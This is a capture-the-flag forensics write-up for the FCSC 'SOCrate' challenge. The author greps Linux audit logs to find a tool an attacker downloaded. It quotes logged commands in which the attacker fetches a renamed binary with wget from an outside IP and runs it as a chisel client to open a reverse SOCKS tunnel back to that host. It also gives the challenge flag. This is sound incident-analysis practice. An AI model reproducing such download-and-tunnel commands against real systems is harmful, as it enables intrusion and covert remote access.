FCSC : SOCrate - Outil téléchargé

Statement: In June 2023, an operator of vital importance falls victim to an attack that compromises its entire information system. You have received the Linux and Windows logs and must answer the investigators’ questions.

Note: The parts are numbered in the chronological order of the attack, but it is not necessary to solve them in order.

The attacker used the reverse shell in question 2 to download a tool. He then executed this tool.

Find the URL of the download and the original name of the tool (the binary having been renamed).

Flag format: FCSC{URL|ORIGINAL_NAME}

Example: FCSC{https://10.42.43.44/toto|nmap}

Following SOCrate - Reverse shell challenge, I need to find the downloaded binary.

I search for the values wget and http:// :

# cat linux/*.log | grep -i "execve" | grep "wget" | grep "http://"

node=webserver type=EXECVE msg=audit(1686646267.966:2918): argc=2 a0="wget" a1="http://80.125.9.58/cat"
node=webserver type=EXECVE msg=audit(1686646380.058:2930): argc=2 a0="wget" a1="http://80.125.9.58:80/text"
node=webserver type=EXECVE msg=audit(1686646703.870:3009): argc=2 a0="wget" a1="http://80.125.9.58:80/text"

I noticed some downloads, so I did a search on text :

# cat linux/*.log | grep -i "execve" | grep "./text"

...
node=webserver type=EXECVE msg=audit(1686822736.877:13593): argc=5 a0="./text" a1="client" a2="-v" a3="80.125.9.58:4444" a4="R:socks"
node=webserver type=EXECVE msg=audit(1686829485.797:13789): argc=6 a0="sudo" a1="./text" a2="client" a3="-v" a4="80.125.9.58:4444" a5="R:socks"
...

The renamed binary corresponds to the well-known chisel, which can be used to configure TCP/UDP tunnels transported over HTTP.

Flag : FCSC{http://80.125.9.58:80/text|chisel}